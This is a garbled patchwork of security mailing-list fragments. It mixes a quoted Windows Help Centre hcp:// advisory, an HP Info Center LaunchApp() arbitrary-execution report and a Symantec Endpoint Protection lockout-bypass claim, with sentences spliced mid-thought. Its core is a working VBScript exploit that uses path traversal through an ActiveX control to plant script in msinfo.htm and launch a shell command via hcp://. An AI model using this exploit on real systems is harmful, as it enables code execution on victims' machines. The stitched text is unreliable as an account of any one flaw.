Tavis Ormandy wrote:
> Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
> ----------------------------------------------------------------------------
>
> Help and Support Centre is the default application provided to access online
> documentation for Microsoft Windows. Microsoft supports accessing help documents
> directly via URLs by installing a protocol handler for the scheme "hcp",
> a typical example is provided in the Windows XP Command Line Reference,
> available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
>
Subject: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
Using hcp:// URLs is intended to be safe, as when invoked via the registered
an application built to support the user with quick wifi configuration, update check and so on.
The application window contains an embedded IE control to launch the HPINFO ActiveX CTL.
IE uses the JS script 'HPInfoCenter.js', located in the same dir, which is used to respond to
user input. When the user selects the option he is interested in, the JS code executes the HPINFO
control's LaunchApp() method, which spawns the new process using a JS-code-specified path
(e.g. Wireless Assistant, Help and Support Center, ...).
The first problem is that the path variable passed as an argument to the LaunchApp() method
doesn't distinguish between the global disk area and the local HP software area.
Therefore, using this method, one is able to launch ANY executable binary within the system
within the logged-on user's context.
Combining this method with the system command shell, one can execute any shell command sequence:
<SCRIPT language='VBScript'>
<!--
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'file path is injected into msinfo.htm; you can see the code with a hex editor. Some limit on the *number* of chars, some problem with newlines, resolved with VBScript code evaluation by Execute(); a popup says "Unable to post..." - click OK or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe through the Help and Support Center service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
-->
</SCRIPT>
original url: http://retrogod.altervista.org/9sg_supportsoft_ce_l_hai_nel_dna.html
denied access to.
When the batch file is running, open the file "c:\Program
Files\Symantec\Symantec Endpoint Protection\symcorpui.exe".
Even if the password has been set or the administrator has disabled the user
from opening the GUI, all the conditions will be bypassed.
And as I said before, the Help and Support > Troubleshooting will show the
server as offline for the client and the NTP will not be visible if it's
installed.
Thank you.